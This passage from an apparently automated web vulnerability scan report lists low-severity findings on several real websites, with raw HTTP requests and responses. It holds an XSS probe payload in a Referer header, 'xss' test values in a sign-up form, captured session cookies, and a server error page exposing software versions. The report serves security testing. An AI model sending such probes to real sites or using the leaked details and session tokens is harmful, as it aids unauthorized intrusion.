GET /service/restv1/most-popular/daily/most_hbr/10/mostResphdlr?_=1320847772502 HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive X-Requested-With: XMLHttpRequest Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="; marketing_interruption=iperceptions; IPERCEPTIONS_555=IPERCEPTIONS_555_COOKIE; IPE_S_555=IPE_555_Session; __qca=P0-1531370892-1320847772355; __utma=163134883.1936267531.1320847772.1320847772.1320847772.1; __utmb=163134883.1.10.1320847772; __utmc=163134883; __utmz=163134883.1320847772.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:37 GMT X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5 Content-Type: text/plain; charset=UTF-8 Cache-Control: max-age=0 Expires: Wed, 09 Nov 2011 14:09:37 GMT LEG: 5 Vary: Accept-Encoding Content-Length: 1466 mostResphdlr([{"pageUrl":"http://blogs.hbr.org/schwartz/2011/11/four-destructive-myths-most-co.html","pageTitle":"Four Destructive Myths Most Companies Still Live By - Tony Schwartz - Harvard Business...[SNIP]...
6.57. http://hbr.org/service/restv1/usersession/clickStream
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/service/restv1/usersession/clickStream
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT HWF_HISTORY=11|landing:2|; Version=1; Comment="Click Stream History"; Domain=hbr.org; Max-Age=2592000; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /service/restv1/usersession/clickStream?uri=http%3A%2F%2Fhbr.org%2Fproduct%2Fhow-venture-capitalists-evaluate-potential-venture%2Fan%2F805019-PDF-ENG%3FNtt%3DVenture%2BCapital%2Bprocess%26Nao%3D10&_=1320847772514 HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive X-Requested-With: XMLHttpRequest Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="; marketing_interruption=iperceptions; IPERCEPTIONS_555=IPERCEPTIONS_555_COOKIE; IPE_S_555=IPE_555_Session; __qca=P0-1531370892-1320847772355; __utma=163134883.1936267531.1320847772.1320847772.1320847772.1; __utmb=163134883.1.10.1320847772; __utmc=163134883; __utmz=163134883.1320847772.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:37 GMT X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5Set-Cookie: HWF_HISTORY=11|landing:2|; Version=1; Comment="Click Stream History"; Domain=hbr.org; Max-Age=2592000; Path=/ Content-Length: 0 Cache-Control: max-age=0 Expires: Wed, 09 Nov 2011 14:09:37 GMT LEG: 5 Content-Type: text/plain; charset=UTF-8
6.58. http://hbr.org/service/restv1/usersession/displayChallenge
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/service/restv1/usersession/displayChallenge
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /service/restv1/usersession/displayChallenge?_=1320847774791 HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive X-Requested-With: XMLHttpRequest Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="; marketing_interruption=iperceptions; IPERCEPTIONS_555=IPERCEPTIONS_555_COOKIE; IPE_S_555=IPE_555_Session; __qca=P0-1531370892-1320847772355; __utma=163134883.1936267531.1320847772.1320847772.1320847772.1; __utmb=163134883.1.10.1320847772; __utmc=163134883; __utmz=163134883.1320847772.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; wooTracker=G5RMAE2ZVH7UCIFHHSZJU2OLNM5HSHKA; wooMeta=MjMyNTE4MTkmMSYxJjAmMTMyMDg0Nzc3NjUzOCYxMzIwODQ3Nzc2NTM5Jmh0dHAlM0ElMkYlMkZ3d3cuZmFrZXJlZmVycmVyZG9taW5hdG9yLmNvbSUyRnJlZmVycmVyUGF0aE5hbWUlM0ZSZWZQYXJOYW1lJTNEUmVmVmFsdWUmMTAyJiYyJiYmJg==; HWF_HISTORY=11|landing:1|
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:39 GMT X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5 Content-Type: text/plain; charset=UTF-8 Cache-Control: max-age=0 Expires: Wed, 09 Nov 2011 14:09:39 GMT LEG: 5 Vary: Accept-Encoding Content-Length: 5 false
6.59. http://ox-d.hbr.org/w/1.0/ajs
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://ox-d.hbr.org
Path:
/w/1.0/ajs
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:OX_u=c5d0cc11-c3a1-02f2-2f7e-104ff35dd0d5_a_1322057367; Version=1; Expires=Thu, 08 Nov 2012 14:09:27 GMT; Max-Age=31536000; Path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /w/1.0/ajs?o=9606032419&pgid=3803&res=1920x1200x16&plg=swf,sl,qt,wmp,shk&ch=UTF-8&tz=360&url=http%3A//hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG%3FNtt%3DVenture+Capital+process%26Nao%3D10&ref=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&cb=9606032419 HTTP/1.1 Host: ox-d.hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 302 Moved TemporarilySet-Cookie: OX_u=c5d0cc11-c3a1-02f2-2f7e-104ff35dd0d5_a_1322057367; Version=1; Expires=Thu, 08 Nov 2012 14:09:27 GMT; Max-Age=31536000; Path=/ Server: MochiWeb/1.1 WebMachine/1.8.1 (participate in the frantic) P3P: CP="CUR ADM OUR NOR STA NID" Location: http://u.openx.net/w/1.0/sc?r=http%3A%2F%2Fox-d.hbr.org%2Fw%2F1.0%2Fajs%3Fo%3D9606032419%26pgid%3D3803%26res%3D1920x1200x16%26plg%3Dswf%2Csl%2Cqt%2Cwmp%2Cshk%26ch%3DUTF-8%26tz%3D360%26url%3Dhttp%253A%2F%2Fhbr.org%2Fproduct%2Fhow-venture-capitalists-evaluate-potential-venture%2Fan%2F805019-PDF-ENG%253FNtt%253DVenture%2BCapital%2Bprocess%2526Nao%253D10%26ref%3Dhttp%253A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%253FRefParName%253DRefValue%26cb%3D9606032419 Date: Wed, 09 Nov 2011 14:09:27 GMT Content-Length: 0 Connection: close
6.60. http://www.mongodb.org/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.mongodb.org
Path:
/
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:__sid=f4abf7ce84e71ec0885a35b20057e54fc2451ed0; expires=Tue, 04-Nov-2031 13:03:11 GMT; Path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.mongodb.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.mongodb.com/
Response
HTTP/1.1 200 OK Server: Apache/2.2.16 (Amazon) Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Date: Wed, 09 Nov 2011 13:03:11 GMT Connection: Keep-AliveSet-Cookie: __sid=f4abf7ce84e71ec0885a35b20057e54fc2451ed0; expires=Tue, 04-Nov-2031 13:03:11 GMT; Path=/ Content-Length: 10884 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">...[SNIP]...
7. Password field with autocomplete enabled
previous
next
There are 3 instances of this issue:
Issue background
Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application. The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.
Issue remediation
To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).
7.1. https://account.covestor.com/mirroring-account/join-trial
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://account.covestor.com
Path:
/mirroring-account/join-trial
Issue detail
The page contains a form with the following action URL:https://account.covestor.com/mirroring-account/join-trial The form contains the following password field with autocomplete enabled:
Request
GET /mirroring-account/join-trial HTTP/1.1 Host: account.covestor.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://covestor.com/ Cookie: COVESTOR_AFF=%255BUS%255D%26%26%26%26http%253A%252F%252Fcovestor%252Ecom%252F; __utma=100923155.1926746815.1320845508.1320845508.1320845508.1; __utmb=100923155.1.10.1320845508; __utmc=100923155; __utmz=100923155.1320845508.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName
Response
HTTP/1.1 200 OK Date: Wed, 09 Nov 2011 13:41:03 GMT Server: COVESTOR Set-Cookie: COVESTOR=;domain=.covestor.com;Secure;expires=Tue, 09-Nov-2010 13:41:03 GMT;path=/ Set-Cookie: C1320846063712=CCC%20https%3A%2F%2Faccount%2Ecovestor%2Ecom%2Fmirroring%2Daccount%2Fjoin%2Dtrial;domain=.covestor.com;expires=Wed, 09-Nov-2011 13:46:02 GMT;path=/ Expires: Wed, 09 Nov 2011 13:41:03 GMT Vary: Accept-Encoding Keep-Alive: timeout=15, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 24468 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <!-- start head:me...[SNIP]... </big> <form name="trial-signup" action="" method="post"> <fieldset>...[SNIP]... </label> <input type="password" id="trial-pass" name="password" value="" /> <script>...[SNIP]...
7.2. http://www.codecademy.com/register
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.codecademy.com
Path:
/register
Issue detail
The page contains a form with the following action URL:http://www.codecademy.com/register The form contains the following password fields with autocomplete enabled:user[password] user[password_confirmation]
Request
POST /register HTTP/1.1 Host: www.codecademy.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.codecademy.com/register/sign_up Cookie: _session_id=b7640ca9ddcffb8af2fd7c334979c23f; __cfduid=db4a462d070293e742b13078486147a6e1320845498; __cfduid=db4a462d070293e742b13078486147a6e1320845498; kvcd=1320846349290; km_ni=4eba840d41101a00010081bc; km_uq=; km_vs=1; km_lv=x; __utma=132207260.1401812232.1320845500.1320845500.1320845500.1; __utmb=132207260.10.10.1320845500; __utmc=132207260; __utmz=132207260.1320845500.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; _chartbeat2=usa3hg953cdmxxth.1320845511963; km_ai=4eba840d41101a00010081bc Content-Type: application/x-www-form-urlencoded Content-Length: 174 utf8=%E2%9C%93&authenticity_token=KhTJ2Z6u1ogoRDWZKh1GzcuAPxegEYGLU0BsTXhCzjI%3D&user%5Bemail%5D=xss&user%5Bpassword%5D=xss&user%5Bpassword_confirmation%5D=xss&commit=Sign+up
Response
HTTP/1.1 200 OK Server: cloudflare-nginx Date: Wed, 09 Nov 2011 13:47:11 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive Etag: "da96b02c6671777cb94c18da763f1f6b" Cache-Control: max-age=0, private, must-revalidate X-Ua-Compatible: IE=Edge,chrome=1 Set-Cookie: _session_id=7223ebe20bb6b62e4f99c09916b0aae7; path=/; HttpOnly X-Runtime: 0.129815 Content-Length: 7397 <!DOCTYPE html> <html lang='en'> <head> <script type="text/javascript"> var _sf_startpt=(new Date()).getTime(); var root_url = "http://www.codecademy.com/"; var _kmq = _kmq || []; function _kms(u...[SNIP]... </h2><form accept-charset="UTF-8" action="/register" class="user_new" id="user_new" method="post"> <div style="margin:0;padding:0;display:inline">...[SNIP]... <span class="field_with_errors"><input id="user_password" name="user[password]" placeholder="Password" size="30" type="password" value="" /> </span>...[SNIP]... <td><input id="user_password_confirmation" name="user[password_confirmation]" placeholder="Password confirmation" size="30" type="password" value="" /> </td>...[SNIP]...
7.3. http://www.codecademy.com/register/sign_up
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.codecademy.com
Path:
/register/sign_up
Issue detail
The page contains a form with the following action URL:http://www.codecademy.com/register The form contains the following password fields with autocomplete enabled:user[password] user[password_confirmation]
Request
GET /register/sign_up HTTP/1.1 Host: www.codecademy.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.codecademy.com/courses/jquery-and-the-dom/0 Cookie: _session_id=b7640ca9ddcffb8af2fd7c334979c23f; __cfduid=db4a462d070293e742b13078486147a6e1320845498; __cfduid=db4a462d070293e742b13078486147a6e1320845498; kvcd=1320846349290; km_ni=4eba840d41101a00010081bc; km_uq=; km_vs=1; km_lv=x; __utma=132207260.1401812232.1320845500.1320845500.1320845500.1; __utmb=132207260.9.10.1320845500; __utmc=132207260; __utmz=132207260.1320845500.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; _chartbeat2=usa3hg953cdmxxth.1320845511963; km_ai=4eba840d41101a00010081bc
Response
HTTP/1.1 200 OK Server: cloudflare-nginx Date: Wed, 09 Nov 2011 13:47:02 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive Etag: "ea3d8c08b1c8cae71dcc130da39e37c6" Cache-Control: max-age=0, private, must-revalidate X-Ua-Compatible: IE=Edge,chrome=1 X-Runtime: 0.055047 X-Varnish: 2091622008 Age: 0 Via: 1.1 varnish Content-Length: 7111 <!DOCTYPE html> <html lang='en'> <head> <script type="text/javascript"> var _sf_startpt=(new Date()).getTime(); var root_url = "http://www.codecademy.com/"; var _kmq = _kmq || []; function _kms(u...[SNIP]... </h2><form accept-charset="UTF-8" action="/register" class="user_new" id="user_new" method="post"> <div style="margin:0;padding:0;display:inline">...[SNIP]... <td><input id="user_password" name="user[password]" placeholder="Password" size="30" type="password" /> </td>...[SNIP]... <td><input id="user_password_confirmation" name="user[password_confirmation]" placeholder="Password confirmation" size="30" type="password" /> </td>...[SNIP]...
8. Source code disclosure
previous
next
There are 2 instances of this issue:
Issue background
Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.
Issue remediation
Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.
8.1. http://www.codecademy.com/assets/application.js
previous
next
Summary
Severity:
Low
Confidence:
Tentative
Host:
http://www.codecademy.com
Path:
/assets/application.js
Issue detail
The application appears to disclose some server-side source code written in PHP.
Request
GET /assets/application.js?1320772907 HTTP/1.1 Host: www.codecademy.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.codecademy.com/ Cookie: _session_id=b7640ca9ddcffb8af2fd7c334979c23f; __cfduid=db4a462d070293e742b13078486147a6e1320845498; __cfduid=db4a462d070293e742b13078486147a6e1320845498
Response
HTTP/1.1 200 OK Server: cloudflare-nginx Date: Wed, 09 Nov 2011 13:31:39 GMT Content-Type: application/javascript Connection: keep-alive Last-Modified: Tue, 08 Nov 2011 17:21:47 GMT Cache-Control: public, max-age=43200 X-Varnish: 2242468456 Age: 0 Via: 1.1 varnish CF-Cache-Status: HIT Vary: Accept-Encoding Expires: Thu, 10 Nov 2011 01:31:39 GMT Content-Length: 265624 /*! * jQuery JavaScript Library v1.6.2 * http://jquery.com/ * * Copyright 2011, John Resig * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * Includes Siz...[SNIP]... n"+H+"\n\n";H=k(H);H=H.replace(/^[ \t]+$/mg,"");H=i(H);H=h(H);H=g(H);H=q(H);H=H.replace(/~D/g,"$$");H=H.replace(/~T/g,"~");return H};var h=function(H){var H=H.replace(/^[ ]{0,3}\[(.+)\]:[ \t]*\n?[ \t]*<?(\S+?)>?[ \t]*\n?[ \t]*(?:(\n*)["(](.+?)[")][ \t]*)?(?:\n+|\Z)/gm,function(L,M,K,J,I){M=M.toLowerCase();s[M]=l(K);if(J){return J+I}else{if(I){r[M]=I.replace(/"/g,""")}}return""});return H};var i=function(J){J=J.replace(/\n/g,"\n\n");var I="p|div|h[1-6]|blockquote|pre|table|dl|ol|ul|script|noscript|form|fieldset|iframe|math|ins|del";var H="p|div|h[1-6]|blockquote|pre|table|dl|ol|ul|script|noscript|form|fieldset|iframe|math";J=J.replace(/^(<(p|div|h[1-6]|blockquote|pre|table|dl|ol|ul|script|noscript|form|fieldset|iframe|math|ins|del)\b[^\r]*?\n<\/\2>[ \t]*(?=\n+))/gm,d);J=J.replace(/^(<(p|div|h[1-6]|blockquote|pre|table|dl|ol|ul|script|noscript|form|fieldset|iframe|math)\b[^\r]*?.*<\/\2>[ \t]*(?=\n+)\n)/gm,d);J=J.replace(/(\n[ ]{0,3}(<(hr)\b([^<>])*?\/?> )[ \t]*(?=\n{2,}))/g,d);J=J.replace(/(\n\n[ ]{0,3}<!(--[^\r]*?--\s*)+>...[SNIP]...
8.2. http://www.sequoiacap.com/javascripts/sc.js
previous
next
Summary
Severity:
Low
Confidence:
Tentative
Host:
http://www.sequoiacap.com
Path:
/javascripts/sc.js
Issue detail
The application appears to disclose some server-side source code written in ASP.
Request
GET /javascripts/sc.js?1320687361 HTTP/1.1 Host: www.sequoiacap.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.sequoiacap.com/42fa0%3Cscript%3Ealert(/XSS/)%3C/script%3Ecf97f530072
Response
HTTP/1.1 200 OK Server: nginx/0.7.67 Date: Wed, 09 Nov 2011 14:13:04 GMT Content-Type: application/x-javascript Last-Modified: Mon, 07 Nov 2011 17:36:01 GMT Connection: keep-alive Content-Length: 94715 /* * jQuery history plugin * * sample page: http://www.mikage.to/jquery/jquery_history.html * * Copyright (c) 2006-2009 Taku Sano (Mikage Sawatari) * Licensed under the MIT License: * http:/...[SNIP]... ++)c.call(d,e)};b.breakLoop=function(){throw r;};b.mixin=function(a){i(b.functions(a),function(c){F(c,b[c]=a[c])})}; var G=0;b.uniqueId=function(a){var c=G++;return a?a+c:c};b.templateSettings={start:"<%",end:"%> ",interpolate:/<%=(.+?)%>...[SNIP]...
9. Referer-dependent response
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.mongodb.org
Path:
/s/1627/3/1.0/_/download/batch%27/confluence.web.resources:print-styles/confluence.web.resources:print-styles.css
Issue description
The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present. Common explanations for Referer-dependent responses include:Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function. Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defences are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques. Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.
Issue remediation
The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing. If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.
Request 1
GET /s/1627/3/1.0/_/download/batch%27/confluence.web.resources:print-styles/confluence.web.resources:print-styles.css?media=print HTTP/1.1 Host: www.mongodb.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-aliveReferer: http://burp/show/5 Cookie: __sid=f4abf7ce84e71ec0885a35b20057e54fc2451ed0; __utma=266042259.1760966378.1320843794.1320843794.1320843794.1; __utmb=266042259.6.10.1320843794; __utmz=266042259.1320843794.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; _mkto_trk=id:017-HGS-593&token:_mch-mongodb.org-1320843794269-29708; JSESSIONID=BA89C686021CA5448E1370C96EB97C02; rack.session=BAh7AA%3D%3D%0A; __utmc=266042259
Response 1
HTTP/1.1 500 Internal Server Error Vary: Accept-Encoding Cache-Control: max-age=3600 Content-Type: text/html;charset=ISO-8859-1 Date: Wed, 09 Nov 2011 13:19:29 GMT Connection: close X-xgen-cache: yes X-Cache-Info: not cacheable; response code not cacheable <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]... <p>http://burp/show/5</p> <h3>Confluence Application Information</h3> <h4>Build Information</h4> <p> home: /opt/j2ee/domains/onconfluence.com/mongodb/webapps/atlassian-confluence/data/current<br> buildNumber: 1627<br> upTime: 1 day, 41 minutes, 14 seconds<br> devMode: false<br> version: 3.0.0_01<br> Unique ID: 0x00000133887BBAD443DDE9958234E671047E45270126C358C7551AA62EB2F1A2 </p> <h4>Server information</h4> <p> Application Server: Apache Tomcat/5.5.20<br> Servlet Version: 2.4<br> Database Dialect: net.sf.hibernate.dialect.PostgreSQLDialect<br> Database Driver Name: null<br> Database Driver Version: 8.3<br> Database Name: PostgreSQL<br> Database Version: 8.3.7<br> Database Transaction Isolation: Read committed Database Latency: 0<br> </p> <h4>Memory Information</h4> <p> Total Memory: 986 MB<br> Used Memory: 684 MB<br> Free Memory: 302 MB<br> </p> <h4>System Information</h4> <p> favouriteColour: Lemon chiffon<br> javaRuntime: Java(TM) SE Runtime Environment<br> jvmVersion: 1.0<br> operatingSystem: Linux 2.6.18-128.1.6.el5<br> fileSystemEncoding: ANSI_X3.4-1968<br> javaVm: Java HotSpot(TM) 64-Bit Server VM<br> javaVendor: Sun Microsystems Inc.<br> userTimezone: America/New_York<br> jvmImplementationVersion: 10.0-b23<br> appServer: Apache T...[SNIP]...
Request 2
